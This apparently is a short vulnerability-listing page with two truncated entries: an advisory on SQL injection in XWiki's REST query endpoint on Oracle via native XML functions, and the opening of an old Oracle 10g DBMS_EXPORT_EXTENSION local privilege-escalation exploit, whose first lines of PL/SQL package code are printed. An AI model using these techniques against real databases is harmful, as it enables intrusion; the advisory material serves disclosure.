GHSA-PRWH-7838-XF82 XWiki allows SQL injection in query endpoint of REST API with Oracle

Impact It's possible to execute any SQL query in Oracle by using the function like DBMSXMLGEN or DBMSXMLQUERY. The XWiki query validator does not sanitize functions that would be used in a simple select and Hibernate allows using any native function in an HQL query. Patches This has been patched ...

Oracle <= 10g Release 2 (DBMS_EXPORT_EXTENSION) Local SQL Exploit

No description provided by source. / 0day, description is wrong. /str0ke / / Fucking NON-0 day$ exploit for Oracle 10g 10.2.0.2.0 Patch your database now! by N1V1Hd $3c41r3 / CREATE OR REPLACE PACKAGE MYBADPACKAGE AUTHID CURRENTUSER IS FUNCTION ODCIIndexGetMetadata oindexinfo SYS.odciindexinfo,P3...